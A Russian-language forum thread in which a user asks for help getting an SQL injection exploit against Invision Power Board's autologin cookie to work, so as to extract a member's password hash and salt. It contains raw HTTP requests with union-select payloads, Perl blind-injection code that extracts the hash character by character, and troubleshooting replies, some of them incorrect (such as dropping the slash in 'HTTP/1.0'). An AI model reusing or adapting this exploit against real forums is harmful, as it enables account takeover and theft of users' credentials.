В общем делаю такой запрос!
GET localhost/forum/index.php?act=Login&CODE=autologin HTTP/1.0
Accept: */*
Host: localhost
Cookie: member_id=31337420; pass_hash=1%2527+union+select+converge_id,converge _pass_salt,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 +from+ibf_members_converge+where+converge_id%3D1+/*
Connection: close


А возвращает вот что:
HTTP/1.1 400 Bad Request
Date=Mon, 01 Aug 2005 21:19:41 GMT
Server=Apache/1.3.31 (Win32) PHP/4.3.10
Connection=close
Transfer-Encoding=chunked
Content-Type=text/html; charset=iso-8859-1


Я не могу получишь ХЕШ...

Чё я не так делаю?

чем ты его делаешь ? и как

В общем делаю такой запрос!


А возвращает вот что:



Я не могу получишь ХЕШ...

Чё я не так делаю?


В общем сечас пытаюсь делать программой InetCrack А если получится буду
делать программу... Вот карочий PERL не знаю что смог вытенуть с сплойта то
и вытинул...

$non="1%2527+union+select+converge_id%2Cconverge_pass_sa lt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3);

попробуй заменить localhost на домен сервера, и в GET запросе добавить http://
GET http://www.site.ru/forum/index.php?act=Login&CODE=autologin HTTP/1.0
Accept: */*
Host: site.ru
Cookie: member_id=31337420; pass_hash=1%2527+union+select+converge_id,converge _pass_salt,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 +from+ibf_members_converge+where+converge_id%3D1+/*
Connection: close

Не фига не чего не возвращает а запрос ка OK. принел но MYSQL не выполняет
блин ПАРЮСЬ Я ПАРЮСЬ...

Лучше помогите перевести это:

Если не трудно перевидет на язык DELPHI...

Sub check($)
{
$n++;
status();
$ccheck = $_[0];
$non="1%2527+union+select+converge_id%2Cconverge_pass_sa lt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) {
return 1; }
}


return 0;
}



Или хотя бы эти строки
$non="1%2527+union+select+converge_id%2Cconverge_pass_sa lt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;


printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3);

В конце пакета незабуть ставить два пробела, и для начала работай с асинхронным сокетом, иначе должны быть спец приемы чтоб получить ответ. Сам парился пока писал флудер.

>В конце пакета незабуть ставить два пробела
Наверное ты имел в виду 2 перевода строки (#13#10)
На практике надо ставить в конец пакета 1 перевод строки (в RFC 2616 (http://rfc.net/rfc2616.html) сказано ставить 1)

Верно перевод строки. Я пишу на BuilderC++6 и правильно заработало только с 2мя переводами.

Ну тогда дайте на B...c++6?

Где вы?

Вот так будет на билдере:

GET http://www.host.ru HTTP/1.0\r\n
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n
Accept-Language: ru\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: www.host.ru\r\n
\r\n

Вот так будет на билдере:

GET http://www.host.ru HTTP/1.0\r\n
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n
Accept-Language: ru\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: www.host.ru\r\n
\r\n

запрос у тебя слишком длинный, рекомендую убрать все поля кроме Host (это поле нужно, если потом через прокси надо будет работать).
конечно иногда сервера игнорят пакеты без User-Agent, но это очень редко

Запросы я умею ДЕЛАТЬ!!! Мне надо именно запустить сплойт!!!
Вот почему я Perl код сплойта скинул!!!

$non="1%2527+union+select+converge_id%2Cconverge_pass_sa lt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
разве это непонятно?
%2C - , (запятая)
А 0 это нолик.
Остальное проще простого.
зы Ждемс репутации)))Фучу

Так я и делаю!!! Заглени в первую страничку!!! Но не выходит... :(

Упс,не заметил...

Ладно всем спсибо кто хоть чем то мог помоч!

Придется Perl учить!

AIN если неразобрался в чем дело, то попробуй заместо
GET localhost/forum/index.php?act=Login&CODE=autologin HTTP/1.0
зделать
GET localhost/forum/index.php?act=Login&CODE=autologin HTTP1.0
должно зароботать.

AIN если неразобрался в чем дело, то попробуй заместо
GET localhost/forum/index.php?act=Login&CODE=autologin HTTP/1.0
зделать
GET localhost/forum/index.php?act=Login&CODE=autologin HTTP1.0
должно зароботать.

лол%) вообще-то версии в протоколе хттп обозначаютсся через "/", и то что ты посоветовал уж точно не поможет

GET localhost/forum/index.php?act=Login&CODE=autologin HTTP/1.0


GET http://localhost